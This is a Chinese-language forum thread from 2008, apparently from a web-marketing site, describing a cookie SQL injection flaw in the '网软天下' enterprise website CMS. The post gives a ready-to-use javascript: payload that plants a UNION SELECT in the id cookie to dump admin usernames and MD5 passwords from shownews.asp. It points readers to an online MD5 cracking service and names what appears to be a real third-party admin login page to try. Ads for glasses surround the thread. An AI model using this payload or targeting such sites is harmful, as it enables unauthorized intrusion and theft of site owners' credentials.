网络营销电子商务研究中心  
How to buy the best prescription safety glasses in Canada? Let's study!
Go Back   网络营销电子商务研究中心 > 网站建设 > 建站交流
Reload this Page 网软天下企业网站管理系统cookies注入漏洞
User Name
Password
 
FAQ Members List Calendar Cheap Glasses Mark Forums Read

建站交流 讨论网站建设的基本方法、技巧、空间问题讨论、域名交流、
资源分享、技术交流,站长们经常进来看看噢!

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1   IP: 222.76.215.26
Old 2008-10-21, 11:12 AM
topvip topvip is offline
超级版主
  
Join Date: 2006-01-04
Posts: 1206
topvip 正向着好的方向发展
Default 网软天下企业网站管理系统cookies注入漏洞
注入漏洞
下面我们来测试一下:我们就来
利用shownews.asp 在地址栏中打开http://127.0.0.1/shownews.asp?id=1 清空地址栏,

利用union语句来注入,提交:javascript:alert(document.cookie="id="+escape("77 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

提交后我们访问http://127.0.0.1/shownews.asp

在页面中直接返回了管理员的帐号和16位MD5加密的密码,这样我们就已成功拿到了管理员的帐号和密码。

然后上http://www.cmd5.com/default.aspx就可以破解16位MD5加密的密码了.

试下http://www.weikete.com/admin/login.asp
Reply With Quote
 

« Previous Thread | Next Thread »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Threaded Mode Threaded Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are Off
[IMG] code is On
HTML code is Off
Forum Jump

Prescription-glasses.com offers prescription glasses online at discount prices.
All times are GMT +8. The time now is 12:23 AM.

配镜中心 - 电子商务网络营销研究中心 - Archive - Top

Powered by vBulletin Version 3.8.7
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.